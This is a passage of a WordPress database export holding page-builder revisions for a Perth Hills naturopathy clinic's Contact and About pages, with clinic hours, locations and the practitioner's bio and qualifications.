x-large;\"></span></span></h3>\n<p><span style=\"font-family: \'Playfair Display\'; font-size: x-large; color: #000000;\"></span></p>\n<h3><span style=\"font-family: \'Playfair Display\'; font-size: x-large; color: #000000;\"></span></h3>\n<h3><span style=\"font-family: \'Playfair Display\'; font-size: x-large; color: #000000;\">Clinic hours:</span></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat;\"></span><span style=\"text-decoration: underline;\"><em><span style=\"font-family: Montserrat; color: #666666; text-decoration: underline;\">Mundaring</span></em></span></span></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\">Tues: 8.15am-12.45pm</span></span></h3>\n<p><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\"></span></span></p>\n<h3><span style=\"text-decoration: underline;\"><em><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666; text-decoration: underline;\">Kalamunda</span></span></em></span></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\">Tues: 2-5pm </span></span><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\">Wed/Thurs: 9am-5pm</span><br /><span style=\"font-family: Montserrat; color: #666666;\">Alternate Saturdays: 9am-1pm</span></span></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\"></span></span></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\">(Online consults available anytime)</span></span><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\"></span></span></h3>\n<p><span style=\"font-family: \'Playfair Display\'; color: #000000; font-size: x-large;\"><strong></strong></span></p>\n<p><span style=\"font-family: \'Playfair Display\'; color: #000000; font-size: x-large;\"></span></p>\n<p><span style=\"font-family: \'Playfair Display\'; color: #000000; font-size: x-large;\">Clinic location:</span></p>\n<p><span style=\"font-family: Montserrat; font-size: large;\">Kalamunda (address given upon booking)</span></p>\n<p><span style=\"font-family: Montserrat; font-size: large;\"> Mundaring Wellness Centre (16 Craig st, Mundaring)</span><span style=\"font-family: Montserrat; font-size: large;\"></span></p>\n<p><span style=\"font-family: Montserrat; font-size: large;\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" use_background_color_gradient=\"on\" background_color_gradient_start=\"rgba(255,255,255,0.8)\" background_color_gradient_end=\"rgba(255,255,255,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" global_module=\"188\" saved_tabs=\"all\" locked=\"off\"][et_pb_row _builder_version=\"4.9.4\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" custom_margin=\"|||265px||\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"#ccd4c8\" border_color_left=\"#a9804a\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\"><strong>Location</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda & Mundaring</span><br /><span style=\"font-family: Montserrat;\">Online consults available</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"][/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" button_icon_color=\"#000000\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"font-family: \'Playfair Display\';\"><strong>Clinic Hours</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed/Thurs: 9-5pm</span><br /><span style=\"font-family: Montserrat;\">Alternate Saturdays: 9-1pm</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Contact','','inherit','closed','closed','','26-revision-v1','','','2021-06-15 12:55:36','2021-06-15 04:55:36','',26,'https://verdenaturopathy.com.au/?p=330',0,'revision','',0),(372,1,'2022-01-21 12:19:15','2022-01-21 04:19:15','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||42px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_row column_structure=\"3_5,2_5\" make_equal=\"on\" _builder_version=\"4.9.4\"][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.4.8\"][et_pb_text _builder_version=\"4.4.7\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||20px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\';\">Meet Mel.</span></h2>[/et_pb_text][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">Mel is a mother, tea lover, avid foodie and degree-qualified naturopath. She resides amongst the trees in the Perth Hills. </span></p>\n<p><span style=\"font-family: Montserrat;\">She has always held a passion for holistic health and wellbeing since a young age. Chronic hormonal imbalances and gut issues led her to her first naturopathy appointment where she gained a newfound respect for the profession after achieving success in returning to health. </span></p>\n<p><span style=\"font-family: Montserrat;\">Mel is passionate about educating and empowering clients to achieve their health goals, working to restore balance between their mental, physical and emotional health. She has witnessed firsthand the healing power of herbs and nutrients, incorporating them into her own life as well as her client’s. Mel also runs Verde Botanicals, offering small-batch, handmade herbal remedies to keep her creative juices flowing. </span></p>\n<p> </p>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"#ccd4c8\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\" custom_css_main_element=\"||||\" box_shadow_style=\"preset2\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/IMG_3973-scaled.jpg\" title_text=\"IMG_3973\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|50|50|100|1|0|-1\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"2_5,3_5\" make_equal=\"on\" _builder_version=\"4.9.4\"][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"#CCD4C8\" custom_padding=\"|20px||20px|false|false\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/IMG_3912-scaled.jpg\" title_text=\"IMG_3912\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|50|50|100|1|0|-1\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"RGBA(0,0,0,0)\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\" custom_css_main_element=\"||||\"][et_pb_text _builder_version=\"4.4.7\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||-5px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"][/et_pb_text][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat,Playfair Display\"]<span style=\"font-family: Montserrat; font;\">Mel has a keen interest in women’s health, gut health, metabolic dysfunction, autoimmunity and mental health. She keeps up to date with the latest research and findings on all things naturopathy, blending traditional knowledge with evidence-based medicine to achieve positive health outcomes. When she’s not consulting or creating, you’ll most likely find her brewing a cuppa, chasing after her three children or wandering through the forest. </span>\n\n<span style=\"font-family: Montserrat; font\"> </span>\n\n<span style=\"font-size: large;\"><strong><span style=\"font-family: \'Playfair Display\';\">Qualifications: </span></strong></span>\n\n<span style=\"font-family: Montserrat; ;\">Bachelor of Health Science (Naturopathy) </span>\n\n<span style=\"font-family: Montserrat; font-;\">Bachelor of Science (Biological Science) </span>\n\n<span style=\"font-family: Montserrat; ;\"> </span>\n\n<span style=\"font-family: \'Playfair Display\'; font-weight: normal; font-size: large;\"><strong>Professional memberships</strong>: </span>\n\n<span style=\"font-family: Montserrat; font;\">Australian Natural Therapist’s Association (ANTA) - Full member</span>\n<ul></ul>\n<span style=\"font-family: Montserrat;\"></span>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" locked=\"off\"][et_pb_row _builder_version=\"4.4.7\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"#000000\" border_style_all=\"none\" border_width_left=\"5px\" border_color_left=\"#a9804a\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\'; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"font-family: \'Playfair Display\';\">Location</span></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda & online</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]<h3></h3>[/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"#c7d3c0\" button_border_width=\"2px\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><span style=\"font-family: \'Playfair Display\';\">Clinic Hours</span></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed: 9am-6pm</span><br /><span style=\"font-family: Montserrat;\">Thurs: 9am-7pm</span><br /><span style=\"font-family: Montserrat;\">Saturday: 9am-1pm</span></p>\n<p> </p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','About','','inherit','closed','closed','','27-revision-v1','','','2022-01-21 12:19:15','2022-01-21 04:19:15','',27,'https://verdenaturopathy.com.au/?p=372',0,'revision','',0),(358,1,'2021-09-14 10:32:24','2021-09-14 02:32:24','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||42px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_row column_structure=\"3_5,2_5\" make_equal=\"on\" _builder_version=\"4.9.4\"][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.4.8\"][et_pb_text _builder_version=\"4.4.7\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||20px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\';\">Meet Mel.</span></h2>[/et_pb_text][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">Mel is a mother, tea lover, avid foodie and degree-qualified naturopath. She resides amongst the trees in the Perth Hills. </span></p>\n<p><span style=\"font-family: Montserrat;\">She has always held a passion for holistic health and wellbeing since a young age. Chronic hormonal imbalances and gut issues led her to her first naturopathy appointment where she gained a newfound respect for the profession after achieving success in returning to health. </span></p>\n<p><span style=\"font-family: Montserrat;\">Mel is passionate about educating and empowering clients to achieve their health goals, working to restore balance between their mental, physical and emotional health. She has witnessed firsthand the healing power of herbs and nutrients, incorporating them into her own life as well as her client’s. Mel also runs Verde Botanicals, offering small-batch, handmade herbal remedies to keep her creative juices flowing. </span></p>\n<p> </p>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"#ccd4c8\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\" custom_css_main_element=\"||||\" box_shadow_style=\"preset2\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/IMG_3973-scaled.jpg\" title_text=\"IMG_3973\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|50|50|100|1|0|-1\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"2_5,3_5\" make_equal=\"on\" _builder_version=\"4.9.4\"][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"#CCD4C8\" custom_padding=\"|20px||20px|false|false\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/IMG_3912-scaled.jpg\" title_text=\"IMG_3912\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|50|50|100|1|0|-1\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"RGBA(0,0,0,0)\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\" custom_css_main_element=\"||||\"][et_pb_text _builder_version=\"4.4.7\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||-5px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"][/et_pb_text][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat,Playfair Display\"]<span style=\"font-family: Montserrat; font;\">Mel has a keen interest in women’s health, gut health, metabolic dysfunction, autoimmunity and mental health. She keeps up to date with the latest research and findings on all things naturopathy, blending traditional knowledge with evidence-based medicine to achieve positive health outcomes. When she’s not consulting or creating, you’ll most likely find her brewing a cuppa, chasing after her three children or wandering through the forest. </span>\n\n<span style=\"font-family: Montserrat; font\"> </span>\n\n<span style=\"font-size: large;\"><strong><span style=\"font-family: \'Playfair Display\';\">Qualifications: </span></strong></span>\n\n<span style=\"font-family: Montserrat; ;\">Bachelor of Health Science (Naturopathy) </span>\n\n<span style=\"font-family: Montserrat; font-;\">Bachelor of Science (Biological Science) </span>\n\n<span style=\"font-family: Montserrat; ;\"> </span>\n\n<span style=\"font-family: \'Playfair Display\'; font-weight: normal; font-size: large;\"><strong>Professional memberships</strong>: </span>\n\n<span style=\"font-family: Montserrat; font;\">Australian Natural Therapist’s Association (ANTA) - Full member</span>\n<ul></ul>\n<span style=\"font-family: Montserrat;\"></span>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" locked=\"off\"][et_pb_row _builder_version=\"4.4.7\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"#000000\" border_style_all=\"none\" border_width_left=\"5px\" border_color_left=\"#a9804a\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\'; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"font-family: \'Playfair Display\';\">Location</span></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda & Mundaring</span><br /><span style=\"font-family: Montserrat;\">Online consults available</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]<h3></h3>[/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"#c7d3c0\" button_border_width=\"2px\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><span style=\"font-family: \'Playfair Display\';\">Clinic Hours</span></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed: 9am-6pm</span><br /><span style=\"font-family: Montserrat;\">Thurs: 8.15am-7pm</span><br /><span style=\"font-family: Montserrat;\">Saturday: 9am-1pm</span></p>\n<p> </p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','About','','inherit','closed','closed','','27-revision-v1','','','2021-09-14 10:32:24','2021-09-14 02:32:24','',27,'https://verdenaturopathy.com.au/?p=358',0,'revision','',0),(335,1,'2021-08-11 13:40:29','2021-08-11 05:40:29','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||42px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_row column_structure=\"3_5,2_5\" make_equal=\"on\" _builder_version=\"4.9.4\"][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.4.8\"][et_pb_text _builder_version=\"4.4.7\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||20px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\';\">Meet Mel.</span></h2>[/et_pb_text][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">Mel is a mother, tea lover, 